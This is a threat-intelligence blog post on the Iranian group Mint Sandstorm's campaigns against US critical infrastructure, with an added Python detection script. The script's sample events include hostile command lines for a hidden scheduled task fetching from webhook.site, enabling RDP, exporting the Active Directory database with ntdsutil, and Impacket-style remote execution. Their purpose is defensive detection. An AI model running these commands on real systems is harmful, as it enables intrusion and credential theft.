The PolySwarm Blog


Mint Sandstorm Targets US Critical Infrastructure

May 1, 2023 3:22:04 PM / by The Hivemind

Related Families: Drokbk, Soldier
Verticals Targeted:
Critical Infrastructure, Telecommunications, Government, Energy, Transportation, Utilities, Oil & Gas

Executive Summary

Mint Sandstorm was recently observed targeting US critical infrastructure entities. These include seaports, energy companies, transportation systems, and a US utility and gas entity.

Key Takeaways

  • Mint Sandstorm was recently observed targeting US critical infrastructure entities.
  • Mint Sandstorm is an Iran nexus threat actor group associated with the Iranian Revolutionary Guard Corps.
  • The threat actors use a combination of phishing, common exploits, and custom tools.

The Campaign

Microsoft recently reported on a nation-state cyber-espionage group, dubbed Mint Sandstorm (formerly Phosphorus), which has been targeting US critical infrastructure entities.

Mint Sandstorm is believed to be associated with the Iranian government and has been using a combination of social engineering, spear-phishing, and common exploits to gain access to its targets' networks. The group has been particularly successful in targeting organizations in the telecommunications and government sectors, as well as energy and transportation sector entities.

Microsoft notes Mint Sandstorm's tactics, techniques, and procedures (TTPs) have evolved over time, reflecting the group's commitment to improving its tradecraft. For example, the group has developed custom malware and improved its phishing emails to make them more convincing.

In recent campaigns, a Mint Sandstorm subgroup has leveraged N-day vulnerabilities in enterprise applications and used targeted phishing to successfully gain access to victim networks. This subgroup has more mature operational capabilities than others under the overall Mint Sandstorm umbrella. From late 2021 to mid-2022, the group began targeting US critical infrastructure, such as seaports, energy companies, transportation systems, and a US utility and gas entity. Earlier this year, the subgroup began leveraging CVE-2022-47966 and CVE-2022-47986 shortly after the PoCs were made publicly available.

After obtaining access to a victim network, the threat actors deploy a custom PowerShell script to use in the discovery process. If the victim does not meet targeting requirements or is not deemed of high enough value, the threat actors seem to halt further action. If they continue to pursue the victim, one of two attack chains is employed.

In the first attack chain, the threat actors move laterally using Impacket and leverage PowerShell scripts to enumerate admin accounts and enable RDP. They then use an SSH tunnel for C2. The main objective in this attack chain seems to be the theft of the Active Directory database. The threat actors can then use these credentials for further access and for social engineering.

In the second attack chain, the threat actors use Impacket for lateral movement, use webhook[.]site for C2, and use scheduled tasks to maintain persistence. They deploy Drokbk, Soldier, or another custom malware variant as the final payload. Drokbk is a custom .NET implant containing an installer and a backdoor payload. Soldier is a multistage .NET backdoor capable of downloading and running additional tools and uninstalling itself.
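The two attack chains above give a defender concrete process-level behaviours to hunt for. The following is an added example, not part of the PolySwarm bulletin or Microsoft's reporting: a small rule set run over constructed Sysmon-style process-creation events. The first two rules map directly to what the bulletin states (a scheduled task whose action reaches webhook[.]site; PowerShell enabling RDP); the last two encode assumptions about how the Active Directory database theft and Impacket lateral movement commonly show up in logs (an ntdsutil IFM export; command output redirected to the ADMIN$ share). All hosts, task names and values are constructed.

```python
import re

# Constructed Sysmon-style process-creation events (hypothetical hosts and values),
# one per behaviour described in the two Mint Sandstorm attack chains plus a benign task.
SAMPLE_EVENTS = [
    {"host": "dc01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -c Set-ItemProperty 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server' -Name fDenyTSConnections -Value 0"},
    {"host": "ws07", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 5 /tn Updater /tr "powershell -w hidden -c iwr https://webhook.site/00000000-0000-0000-0000-000000000000"'},
    {"host": "dc01", "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": 'ntdsutil "ac i ntds" ifm "create full C:\\Windows\\Temp\\out" q q'},
    {"host": "fs02", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1682950000.12 2>&1"},
    {"host": "ws03", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /sc daily /tn Backup /tr C:\Tools\backup.exe"},
]

# Each rule is (name, regex over "<image> <cmdline>"). The first two follow the bulletin
# (scheduled task + webhook.site C2; PowerShell enabling RDP). The last two are assumptions
# about how the AD database theft and Impacket lateral movement typically surface in logs
# (ntdsutil IFM export; cmd output redirected to the ADMIN$ share via loopback).
RULES = [
    ("sched_task_webhook_site_c2",
     re.compile(r"schtasks\.exe.*/create.*webhook\.site", re.I)),
    ("powershell_enables_rdp",
     re.compile(r"powershell\.exe.*fDenyTSConnections.*\b0\b", re.I)),
    ("ad_database_export_ntdsutil",
     re.compile(r"ntdsutil\.exe.*\bifm\b", re.I)),
    ("impacket_style_admin_share_redirect",
     re.compile(r"cmd\.exe.*\\\\127\.0\.0\.1\\ADMIN\$\\__", re.I)),
]


def evaluate(event):
    """Return the names of all rules that match one process-creation event."""
    text = f'{event["image"]} {event["cmdline"]}'
    return [name for name, rx in RULES if rx.search(text)]


def run_detection(events):
    """Return (host, rule) pairs for every event that trips at least one rule."""
    return [(e["host"], name) for e in events for name in evaluate(e)]


if __name__ == "__main__":
    for host, rule in run_detection(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The benign daily backup task on ws03 trips nothing, which is the point of keying the scheduled-task rule on the webhook.site destination rather than on task creation alone.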

Who is Mint Sandstorm?

Mint Sandstorm, also known as Phosphorus, APT35, Charming Kitten, Ajax Security, and NewsBeef, is an Iran nexus threat actor group active since at least 2014. The group is thought to operate on behalf of the Iranian government, with ties to the Iranian Revolutionary Guard Corps. Mint Sandstorm has previously targeted government and military personnel, academics, journalists, and the World Health Organization. Targets were mostly located in the US and the Middle East.

Mint Sandstorm TTPs include but are not limited to social engineering, use of compromised email accounts, targeted phishing attacks, use of Amazon S3 buckets and IRC for C2, exploitation of Log4j vulnerabilities, and watering hole attacks, along with tools such as Havij, sqlmap, Metasploit, Mimikatz, CharmPower, DownPaper, PsExec, and Pupy. Mint Sandstorm is known for its moderate skill level, easily recognizable TTPs, expansive infrastructure, and notoriously sloppy OPSEC.

IOCs

PolySwarm is monitoring for samples of Drokbk and Soldier.

You can use the following CLI command to search for all Drokbk samples in our portal when available: $ polyswarm link list -f Drokbk

You can use the following CLI command to search for all Soldier samples in our portal when available: $ polyswarm link list -f Soldier
